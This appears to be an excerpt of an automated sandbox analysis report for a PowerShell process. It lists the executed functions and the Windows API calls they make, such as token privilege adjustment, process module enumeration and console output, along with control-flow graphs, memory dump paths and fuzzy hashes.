    execution_graph 1283 3ca33c 1286 3ca36a WerSetFlags 1283->1286 1285 3ca3ab 1286->1285 1303 3cb97e 1304 3cb9ba GetConsoleScreenBufferInfo 1303->1304 1306 3cb9f7 1304->1306 1307 1ef02aa 1310 1ef02d6 WriteConsoleW 1307->1310 1309 1ef0324 1310->1309 1217 3cb9ba 1218 3cb9e9 GetConsoleScreenBufferInfo 1217->1218 1220 3cba28 1217->1220 1219 3cb9f7 1218->1219 1220->1218 1221 3ca8fa 1222 3ca94a VerLanguageNameW 1221->1222 1223 3ca958 1222->1223 1311 3ca974 1313 3ca996 CloseHandle 1311->1313 1314 3ca9d0 1313->1314 1315 3ca8b4 1316 3ca8d4 VerLanguageNameW 1315->1316 1318 3ca958 1316->1318 1224 1ef0226 1225 1ef0255 SetConsoleTextAttribute 1224->1225 1226 1ef0294 1224->1226 1227 1ef0263 1225->1227 1226->1225 1319 3cacb7 1320 3cacc1 AdjustTokenPrivileges 1319->1320 1322 3cad3f 1320->1322 1240 3cb8f2 1241 3cb92a CreateFileW 1240->1241 1243 3cb946 1241->1243 1251 3cacee 1253 3cad1d AdjustTokenPrivileges 1251->1253 1254 3cad3f 1253->1254 1255 3cb2ee 1256 3cb323 NtQuerySystemInformation 1255->1256 1258 3cb34e 1255->1258 1257 3cb338 1256->1257 1258->1256 1331 1ef013c 1334 1ef0152 ShowWindow 1331->1334 1333 1ef01c6 1334->1333 1323 3ca1a8 1324 3ca1ee EnumWindows 1323->1324 1326 3ca246 1324->1326 1259 3ca36a 1260 3ca3bf 1259->1260 1261 3ca396 WerSetFlags 1259->1261 1260->1261 1262 3ca3ab 1261->1262 1287 1ef01f9 1288 1ef0226 SetConsoleTextAttribute 1287->1288 1290 1ef0263 1288->1290 1327 3caaab 1329 3caad2 LookupPrivilegeValueW 1327->1329 1330 3cab22 1329->1330 1291 3caf24 1292 3caf42 K32EnumProcessModules 1291->1292 1294 3cafc6 1292->1294 1295 3cb01d 1296 3cb02a K32GetModuleInformation 1295->1296 1298 3cb0b6 1296->1298 1335 3cbbde 1336 3cbc12 GetTokenInformation 1335->1336 1338 3cbc84 1336->1338 1339 1ef0006 1341 1ef0032 SetConsoleTitleW 1339->1341 1342 1ef0074 1341->1342 1228 3ca996 1229 3caa01 1228->1229 1230 3ca9c2 CloseHandle 1228->1230 1229->1230 1231 3ca9d0 1230->1231 1343 3cb8d0 1346 3cb8f2 CreateFileW 1343->1346 1345 3cb946 1346->1345 1232 1ef0182 1233 1ef01e3 1232->1233 1234 1ef01b1 ShowWindow 1232->1234 1233->1234 1235 1ef01c6 1234->1235 1347 3cb2cc 1348 3cb2ee NtQuerySystemInformation 1347->1348 1350 3cb338 1348->1350 1299 3caa0f 1300 3caa42 GetConsoleWindow 1299->1300 1302 3caa80 1300->1302 1267 1ef02d6 1268 1ef0305 WriteConsoleW 1267->1268 1270 1ef0324 1268->1270 1279 3caa42 1280 3caa6b GetConsoleWindow 1279->1280 1281 3caa94 1279->1281 1282 3caa80 1280->1282 1281->1280

    Executed Functions

    Function 003CACB7 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 46 3cacb7-3cad1b 50 3cad1d 46->50 51 3cad20-3cad2f 46->51 50->51 52 3cad31-3cad51 AdjustTokenPrivileges 51->52 53 3cad72-3cad77 51->53 56 3cad79-3cad7e 52->56 57 3cad53-3cad6f 52->57 53->52 56->57
    APIs
    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 003CAD37
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: AdjustPrivilegesToken
    • String ID:
    • API String ID: 2874748243-0
    • Opcode ID: 36ae0fc6151582200f894fc441f9d97a432711c82e476e8fba0887938db8b0f3
    • Instruction ID: 2d45caadd62a4e1fd8feef5c3275637af1878c579669d2808a9f7c1248ef0093
    • Opcode Fuzzy Hash: 36ae0fc6151582200f894fc441f9d97a432711c82e476e8fba0887938db8b0f3
    • Instruction Fuzzy Hash: 6421BC765097849FDB238F25DC44B92BFB4EF06314F0984DAE985CB563D230A918CB62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CACEE Relevance: 1.6, APIs: 1, Instructions: 52COMMON
    Download Yara Rule
    APIs
    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 003CAD37
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: AdjustPrivilegesToken
    • String ID:
    • API String ID: 2874748243-0
    • Opcode ID: d3d65607c20c6ac63292bdf3b2b11a5355b04e27105eb7be448b50f8bcd69aca
    • Instruction ID: 0f585ed9d09fe8f4983a6206b572c2fb46c0c67bf72e3423d8bb74a9ecbac03b
    • Opcode Fuzzy Hash: d3d65607c20c6ac63292bdf3b2b11a5355b04e27105eb7be448b50f8bcd69aca
    • Instruction Fuzzy Hash: 55119E755006089FEB218F55D888B56FBE4EF04325F08C5AEED4ACBA62D331E814DB62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CB2CC Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
    Download Yara Rule
    APIs
    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 003CB329
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: InformationQuerySystem
    • String ID:
    • API String ID: 3562636166-0
    • Opcode ID: b4ebddae1821cd8748ae471283718e4eaf95e70edf57e6a5b6239130efa4d811
    • Instruction ID: 3dd5095f8597a6d242a97ea9321a5dcd3b32cd391243ba7fde3623dcc4d1485a
    • Opcode Fuzzy Hash: b4ebddae1821cd8748ae471283718e4eaf95e70edf57e6a5b6239130efa4d811
    • Instruction Fuzzy Hash: 0A11A075408380AFDB228F11DC45F52FFB4EF06320F09C49EED884B262C275A918CB62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CB2EE Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
    Download Yara Rule
    APIs
    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 003CB329
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: InformationQuerySystem
    • String ID:
    • API String ID: 3562636166-0
    • Opcode ID: 81353bba29235f365b64a67fa8403d04e6d19f04d8f04bd8eb70984725f049e7
    • Instruction ID: ff1931ccc2c53376c4483b823fa3a900b903d5ea47641b64aa0773989dcd29dc
    • Opcode Fuzzy Hash: 81353bba29235f365b64a67fa8403d04e6d19f04d8f04bd8eb70984725f049e7
    • Instruction Fuzzy Hash: CB018B39404344DFEB218F45D886B26FBA0EF44320F18C59EDD894A652C371E918DF62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CAF24 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 0 3caf24-3cafb6 5 3cafb8-3cafc0 K32EnumProcessModules 0->5 6 3cb003-3cb008 0->6 7 3cafc6-3cafd8 5->7 6->5 9 3cb00a-3cb00f 7->9 10 3cafda-3cb000 7->10 9->10
    APIs
    • K32EnumProcessModules.KERNEL32(?,00000E9C,F7D680E1,00000000,00000000,00000000,00000000), ref: 003CAFBE
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: EnumModulesProcess
    • String ID:
    • API String ID: 1082081703-0
    • Opcode ID: 2ad037cde10aeeb62d08e83a37575e1c4e727c3c08252f56ac21a9524c68ca95
    • Instruction ID: efb15b8f0be25d8369f3b3c37e06943e2d5209558989d5dce5d488d8a82faeed
    • Opcode Fuzzy Hash: 2ad037cde10aeeb62d08e83a37575e1c4e727c3c08252f56ac21a9524c68ca95
    • Instruction Fuzzy Hash: 9521D7B25093806FE712CB20DC45FA7BFB8EF46320F0885DBE984DB193C2259949CB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CBBDE Relevance: 1.6, APIs: 1, Instructions: 88COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 13 3cbbde-3cbc74 18 3cbc76-3cbc7e GetTokenInformation 13->18 19 3cbcc1-3cbcc6 13->19 21 3cbc84-3cbc96 18->21 19->18 22 3cbcc8-3cbccd 21->22 23 3cbc98-3cbcbe 21->23 22->23
    APIs
    • GetTokenInformation.KERNELBASE(?,00000E9C,F7D680E1,00000000,00000000,00000000,00000000), ref: 003CBC7C
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: InformationToken
    • String ID:
    • API String ID: 4114910276-0
    • Opcode ID: 422706632c9b2984df2947f0a4a8b18cd08d1f21b244c177ed6e9a480d958751
    • Instruction ID: 75570d9c45f714f5f5bc2d81e5a4b114bb71d15b1d2db25fe063645070a69c86
    • Opcode Fuzzy Hash: 422706632c9b2984df2947f0a4a8b18cd08d1f21b244c177ed6e9a480d958751
    • Instruction Fuzzy Hash: 4231C571509380AFE712CB61DC45FA7BFB8EF46310F08859BE984CB192D224A909C771
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CB01D Relevance: 1.6, APIs: 1, Instructions: 82COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 26 3cb01d-3cb087 30 3cb08c-3cb0a6 26->30 31 3cb089 26->31 33 3cb0a8-3cb0b0 K32GetModuleInformation 30->33 34 3cb0f3-3cb0f8 30->34 31->30 35 3cb0b6-3cb0c8 33->35 34->33 37 3cb0fa-3cb0ff 35->37 38 3cb0ca-3cb0f0 35->38 37->38
    APIs
    • K32GetModuleInformation.KERNEL32(?,00000E9C,F7D680E1,00000000,00000000,00000000,00000000), ref: 003CB0AE
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: InformationModule
    • String ID:
    • API String ID: 3425974696-0
    • Opcode ID: 617a17646f11d3a247d6d939af8ef784e0fd35dae177037e070e774213dc858c
    • Instruction ID: 15811a24eab9b3b0c27e536c26c342e4d301af318eef54f0aa5cfe9bc5ebe372
    • Opcode Fuzzy Hash: 617a17646f11d3a247d6d939af8ef784e0fd35dae177037e070e774213dc858c
    • Instruction Fuzzy Hash: DD219171509380AFE722CB15CC45FA7FFA8EF46320F08849BE949DB192D364E949CB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CA1A8 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 41 3ca1a8-3ca1eb 42 3ca1ee-3ca240 EnumWindows 41->42 44 3ca246-3ca26f 42->44
    APIs
    • EnumWindows.USER32(?,00000E9C,?,?), ref: 003CA23E
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: EnumWindows
    • String ID:
    • API String ID: 1129996299-0
    • Opcode ID: 32a2036cd679be50a4d89974715d3725f22d69335ddcc093881780b77d26014d
    • Instruction ID: ad7f498494ce294e3b98dfd9370ce80142bc02a5c0ac789f36ac3ab575a85f63
    • Opcode Fuzzy Hash: 32a2036cd679be50a4d89974715d3725f22d69335ddcc093881780b77d26014d
    • Instruction Fuzzy Hash: 2221887150D3C05FD3128B258C55B66BFB4EF87620F1985DFD8848F693D228A919CBA2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CA8B4 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 59 3ca8b4-3ca96e VerLanguageNameW
    APIs
    • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 003CA94A
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: LanguageName
    • String ID:
    • API String ID: 2060303382-0
    • Opcode ID: 602e976302bbfb355c8e4293666b980f9f4a434f6df07342d9515ff5e4d2cc47
    • Instruction ID: 4896e2db9a8a04a290cc5d6bf9d3c9a4f39570c9db9fbb4c0737ffc3e2fdc512
    • Opcode Fuzzy Hash: 602e976302bbfb355c8e4293666b980f9f4a434f6df07342d9515ff5e4d2cc47
    • Instruction Fuzzy Hash: 1C21A77540D3806FD3138B25DC51B62BFB4EF87710F1981DBE8888B653D224A91AC7B2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CBC12 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 64 3cbc12-3cbc74 68 3cbc76-3cbc7e GetTokenInformation 64->68 69 3cbcc1-3cbcc6 64->69 71 3cbc84-3cbc96 68->71 69->68 72 3cbcc8-3cbccd 71->72 73 3cbc98-3cbcbe 71->73 72->73
    APIs
    • GetTokenInformation.KERNELBASE(?,00000E9C,F7D680E1,00000000,00000000,00000000,00000000), ref: 003CBC7C
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: InformationToken
    • String ID:
    • API String ID: 4114910276-0
    • Opcode ID: d6985ab939bee70db1cd7a8f802c4e0ec15277b0f3e2b7cc219f64ce9fc88448
    • Instruction ID: b5a4d28aa25f19cd6cde45bd21acddc725082d20d784e82d3728696e9e4a27e4
    • Opcode Fuzzy Hash: d6985ab939bee70db1cd7a8f802c4e0ec15277b0f3e2b7cc219f64ce9fc88448
    • Instruction Fuzzy Hash: 7811A271500204AFFB22CF51DC85FABFBACEF44720F14856AE949DA281D670EA458BB1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01EF013C Relevance: 1.6, APIs: 1, Instructions: 69COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 76 1ef013c-1ef01af 79 1ef01e3-1ef01e8 76->79 80 1ef01b1-1ef01c4 ShowWindow 76->80 79->80 81 1ef01ea-1ef01ef 80->81 82 1ef01c6-1ef01e2 80->82 81->82
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.888384195.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1ef0000_powershell.jbxd
    Similarity
    • API ID: ShowWindow
    • String ID:
    • API String ID: 1268545403-0
    • Opcode ID: 7871d69dc02b201e06e21b4a2173b7a0888f7bb38b086eb982078f02644cef2c
    • Instruction ID: c7febb1a1e85fed998cb93743899da5661c890707a281a193f0a6abe6c8fbf90
    • Opcode Fuzzy Hash: 7871d69dc02b201e06e21b4a2173b7a0888f7bb38b086eb982078f02644cef2c
    • Instruction Fuzzy Hash: 1E21AC7650D3C09FD7138B25CC55696BFB4AF03224F0D80DBE9848F1A3C269A919CB62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CB04A Relevance: 1.6, APIs: 1, Instructions: 67COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 85 3cb04a-3cb087 87 3cb08c-3cb0a6 85->87 88 3cb089 85->88 90 3cb0a8-3cb0b0 K32GetModuleInformation 87->90 91 3cb0f3-3cb0f8 87->91 88->87 92 3cb0b6-3cb0c8 90->92 91->90 94 3cb0fa-3cb0ff 92->94 95 3cb0ca-3cb0f0 92->95 94->95
    APIs
    • K32GetModuleInformation.KERNEL32(?,00000E9C,F7D680E1,00000000,00000000,00000000,00000000), ref: 003CB0AE
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: InformationModule
    • String ID:
    • API String ID: 3425974696-0
    • Opcode ID: 5c5c21f10208f42242c0ff845737d81db703f8afbbabb3e0c11b72c63543d8e8
    • Instruction ID: ebf0fefa5fea3fe49aa1d3447a88954eb4f35138c5c9601383a2d9c4b100e571
    • Opcode Fuzzy Hash: 5c5c21f10208f42242c0ff845737d81db703f8afbbabb3e0c11b72c63543d8e8
    • Instruction Fuzzy Hash: CC11AF75600210EFEB21CF15DC85F6BFBA8EF44320F14856AE909CB281D770E9098BA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01EF02AA Relevance: 1.6, APIs: 1, Instructions: 67COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 98 1ef02aa-1ef0303 100 1ef0308-1ef0314 98->100 101 1ef0305 98->101 102 1ef0357-1ef035c 100->102 103 1ef0316-1ef0336 WriteConsoleW 100->103 101->100 102->103 106 1ef035e-1ef0363 103->106 107 1ef0338-1ef0354 103->107 106->107
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.888384195.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1ef0000_powershell.jbxd
    Similarity
    • API ID: ConsoleWrite
    • String ID:
    • API String ID: 2657657451-0
    • Opcode ID: f91cd8923cb5c1ca2fff8c6fe1764dbda039badf247f0fa3f70758a71b1a04ef
    • Instruction ID: 817bde77ed621ec715e530376099defd025fbf7fa662de0565cdeaf3c900932f
    • Opcode Fuzzy Hash: f91cd8923cb5c1ca2fff8c6fe1764dbda039badf247f0fa3f70758a71b1a04ef
    • Instruction Fuzzy Hash: 6B2192725093809FDB218F25DC45A96FFB4EF06224F08849EED898B163D235E458CB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CAAAB Relevance: 1.6, APIs: 1, Instructions: 66COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 109 3caaab-3caaf9 111 3caafe-3cab04 109->111 112 3caafb 109->112 113 3cab09-3cab12 111->113 114 3cab06 111->114 112->111 115 3cab14-3cab1c LookupPrivilegeValueW 113->115 116 3cab55-3cab5a 113->116 114->113 117 3cab22-3cab34 115->117 116->115 119 3cab5c-3cab61 117->119 120 3cab36-3cab52 117->120 119->120
    APIs
    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 003CAB1A
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: LookupPrivilegeValue
    • String ID:
    • API String ID: 3899507212-0
    • Opcode ID: 9465c9181f1fd3f1ab5ea0794b860d582fe44b5576d79a8fc10c51e330b4bee5
    • Instruction ID: 42bf0b14b72aa26122ccd437f5914d1a2467e87e5ec82bc24bf236ac330a8b2f
    • Opcode Fuzzy Hash: 9465c9181f1fd3f1ab5ea0794b860d582fe44b5576d79a8fc10c51e330b4bee5
    • Instruction Fuzzy Hash: 5A2172716093845FDB22CF25DC44B52BFA8EF46324F0884AEED49CB252D265EC08CB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CB97E Relevance: 1.6, APIs: 1, Instructions: 66COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 122 3cb97e-3cb9e7 124 3cba28-3cba2d 122->124 125 3cb9e9-3cb9f1 GetConsoleScreenBufferInfo 122->125 124->125 126 3cb9f7-3cba09 125->126 128 3cba2f-3cba34 126->128 129 3cba0b-3cba27 126->129 128->129
    APIs
    • GetConsoleScreenBufferInfo.KERNEL32 ref: 003CB9EF
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: BufferConsoleInfoScreen
    • String ID:
    • API String ID: 3437242342-0
    • Opcode ID: c87ea0e0219fa7a83a0583443bdaf17220322a9f1ef12b23cebccc2c3ece89ee
    • Instruction ID: 8a08a7741a5185da455c8357715f9f5172ea39039897af79f905ab9ad2ae2bb1
    • Opcode Fuzzy Hash: c87ea0e0219fa7a83a0583443bdaf17220322a9f1ef12b23cebccc2c3ece89ee
    • Instruction Fuzzy Hash: AC219F765093C09FDB128B25DC55B96BFA4EF07320F0984DBED858F263D224A958CB62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CAF62 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 131 3caf62-3cafb6 134 3cafb8-3cafc0 K32EnumProcessModules 131->134 135 3cb003-3cb008 131->135 136 3cafc6-3cafd8 134->136 135->134 138 3cb00a-3cb00f 136->138 139 3cafda-3cb000 136->139 138->139
    APIs
    • K32EnumProcessModules.KERNEL32(?,00000E9C,F7D680E1,00000000,00000000,00000000,00000000), ref: 003CAFBE
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: EnumModulesProcess
    • String ID:
    • API String ID: 1082081703-0
    • Opcode ID: 77ec99140c9cd806b389822794d03e99d99127ffc9311312ed5a4ee7c14a8231
    • Instruction ID: 7fcdcbe5e6c821c477b8570548e085e50b5f4423fa79eacd6f1f2e4f53611430
    • Opcode Fuzzy Hash: 77ec99140c9cd806b389822794d03e99d99127ffc9311312ed5a4ee7c14a8231
    • Instruction Fuzzy Hash: D111C471500204AFFB22DF55DC85FA7FBA8EF84720F14856EED49DA181D770A9058BB1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01EF0006 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 142 1ef0006-1ef0056 144 1ef005b-1ef0064 142->144 145 1ef0058 142->145 146 1ef0066-1ef006e SetConsoleTitleW 144->146 147 1ef00a5-1ef00aa 144->147 145->144 148 1ef0074-1ef0086 146->148 147->146 150 1ef00ac-1ef00b1 148->150 151 1ef0088-1ef00a4 148->151 150->151
    APIs
    • SetConsoleTitleW.KERNEL32(?), ref: 01EF006C
    Memory Dump Source
    • Source File: 00000003.00000002.888384195.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1ef0000_powershell.jbxd
    Similarity
    • API ID: ConsoleTitle
    • String ID:
    • API String ID: 3358957663-0
    • Opcode ID: e6c7c9fcea78361b6a49cc12609083400d081fa60213e9074792e13748fc3f22
    • Instruction ID: 2d966add68b4dee3f3d9ebd528fdf58b76c0d82f2b509c29413ddc1f59332b39
    • Opcode Fuzzy Hash: e6c7c9fcea78361b6a49cc12609083400d081fa60213e9074792e13748fc3f22
    • Instruction Fuzzy Hash: 622172715093C09FD7128B25DC45B56BFF4DF42224F0984EBED89CB193D269A848CB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CB8D0 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 153 3cb8d0-3cb928 155 3cb92d-3cb936 153->155 156 3cb92a 153->156 157 3cb938-3cb958 CreateFileW 155->157 158 3cb970-3cb975 155->158 156->155 161 3cb95a-3cb96d 157->161 162 3cb977-3cb97c 157->162 158->157 162->161
    APIs
    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 003CB93E
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: CreateFile
    • String ID:
    • API String ID: 823142352-0
    • Opcode ID: fd8d937164b84f4d0e11a82fccde735bfafb52c232e9e59a48138186642bb05b
    • Instruction ID: 62a74b14177dd006a95a35097eea89fdd452281ff169a435a128cddf32175b7a
    • Opcode Fuzzy Hash: fd8d937164b84f4d0e11a82fccde735bfafb52c232e9e59a48138186642bb05b
    • Instruction Fuzzy Hash: 82115E71508384AFDB228F65DC85B52FFF4EF05220F09849EEA898B562D375A818CB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01EF01F9 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
    Download Yara Rule
    APIs
    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 01EF025B
    Memory Dump Source
    • Source File: 00000003.00000002.888384195.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1ef0000_powershell.jbxd
    Similarity
    • API ID: AttributeConsoleText
    • String ID:
    • API String ID: 646522457-0
    • Opcode ID: a19d6fdd75a866d555550f54961aa8b0b0c78aa43e2c5fc017b1165ed8cd4415
    • Instruction ID: ba754507a975c695b5d74c8d1cc7c36b838e181a1e2a2d5fe262e8fae038cca9
    • Opcode Fuzzy Hash: a19d6fdd75a866d555550f54961aa8b0b0c78aa43e2c5fc017b1165ed8cd4415
    • Instruction Fuzzy Hash: 9211D3765083849FEB128F25DC45B96FFA4EF02224F0884EFED848F153D2359449CB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CA33C Relevance: 1.6, APIs: 1, Instructions: 53COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: Flags
    • String ID:
    • API String ID: 3401871038-0
    • Opcode ID: fa806efedbe85a256ac2f1fb3d5ad78cc6f6aa77b1500e96d5a043ad91e2e7a2
    • Instruction ID: b5ac04bfe99ce304322ff792d0221cff264c2529d2046b43e0f96318dc32ac73
    • Opcode Fuzzy Hash: fa806efedbe85a256ac2f1fb3d5ad78cc6f6aa77b1500e96d5a043ad91e2e7a2
    • Instruction Fuzzy Hash: 1D119E715083C49FDB128B15DC54BA2FFB4DF43624F0880DAED848B253C265A808DB62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CAA0F Relevance: 1.6, APIs: 1, Instructions: 53COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: ConsoleWindow
    • String ID:
    • API String ID: 2863861424-0
    • Opcode ID: 25b836bb1759eab4b582f6791311a0fd07866b06605e3357152c5995dd1bd07e
    • Instruction ID: cc89fe25bb5bf3bf01e3edb445ccce911fd5e3b995d54a1ec4b1a54b1489183d
    • Opcode Fuzzy Hash: 25b836bb1759eab4b582f6791311a0fd07866b06605e3357152c5995dd1bd07e
    • Instruction Fuzzy Hash: 7411B27540D7C45FD7128B25DC85B52BFA0EF03324F0980DADD858F163D269A908C762
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CAAD2 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
    Download Yara Rule
    APIs
    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 003CAB1A
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: LookupPrivilegeValue
    • String ID:
    • API String ID: 3899507212-0
    • Opcode ID: 83262700287add43387a9718e1d9f2668579e6a362128ead88e87f9b5df1cf7e
